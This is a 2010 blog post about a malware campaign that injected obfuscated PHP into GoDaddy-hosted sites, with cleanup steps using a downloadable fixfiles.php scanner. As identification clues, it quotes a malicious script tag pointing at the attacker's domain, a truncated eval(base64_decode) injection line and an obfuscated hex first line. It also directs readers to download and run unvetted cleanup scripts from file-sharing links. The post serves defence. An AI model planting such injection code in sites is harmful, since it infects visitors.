Sep 172010
 

Unfortunately Myself and a fellow blogger were included in this attack. Not on this site but on a couple others under another account. First thing you will notice if you are infected is that when you go to a page on your site, a malicious javascript snippet will try and redirect you and load the malware from

<script src="http://myblindstudioinfoonline.com/ll.php"

Which is created by this code added to the top of all or many of your .php files.

eval(base64_decode("aWYoZnVuY3Rpb....

Many WordPress, Drupal, and Joomla as well as other CMS and PHP driven sites could be affected by this so watch out. Luckily it is not a huge deal to disinfect your files thanks to the people at http://blog.sucuri.net/2010/09/godaddy-sites-hacked-myblindstudioinfoonline-com-and-hilary-kneber.html for the info posted earlier today and

http://www.blogtips.org/godaddy-hacked-again-another-way-to-cure/ for the easy to follow instructions. In case you want the details right now, here is the meat of it.

The script will not only work for Godaddy + WordPress, but for any .PHP based site (I used it this morning to cure a Drupal site) on any host.

Here are the right steps to follow:

  1. Make sure you backup your site, just to make sure. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like Filezilla, works fine.
  2. Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
    (Ok, no zipfile? Here is the fixfilesphp.txt version. Save it as fixfiles.php)
  3. FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php etc..):

GoDaddy Root Directory

  1. If you only want to clean a subdirectory (and its underlying tree), put the file in that the subdirectory, but remember also the command in the next line will have to reflect that.
  2. Then execute the code with the command:

    http://yoursite.com/fixfiles.php

    or

    http://yoursite.com/subdir/fixfiles.php

    if you put it in a sub directory)

  3. The code will first scan for the malware code in your files, in both the directory it is put, and all underlying directories.
    If you get the message:

    0 Infected Files in ./

    …then your site is clean.
    If any malware is found, the script will list the infected files and prompt you to fix them:

    malware found - fix the files

    Click on “Fix Files”, Click OK on the prompt to proceed:

    Prompt to fix malware

    1. The script will scan through all files again, and clean the malware. It will list all files that were cleaned.Malware scan finished
    2. Delete the “fixfiles.php” file from your site after execution.
    3. If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE, otherwise the malware will continue to be served to your users, even though you cleaned your .php code

    All of that is “curing” the problem. I have looked everywhere, but am yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on Godaddy), which the hosting companies have been unable to identify and/or close.

    Until such time, scan your sites every day, and cure the problem immediately before your visitors get infected.

    Picture courtesy Owning Pink

    October 31, 2010 UPDATE – Shared hosting on godaddy is again hit by hackers. This time the offending first line in all your .php files begins with -php /**/ $_8b7b=”\x63\x72\x65\x61\x74\x65′

    Here is a link to a modified blog-cleaner.php that will take care of this exploit exactly as the last one did.

    http://www.mediafire.com/?922k0m8ml1cawug

    FTP the file to the root of your compromised website and hit the http at http;//yourblog/blog-cleaner-new.php

    Thanks to Dougie Fresh from http://pics4twitts.com for noticing the problem and thanks to the people above for the original solution.

%d bloggers like this: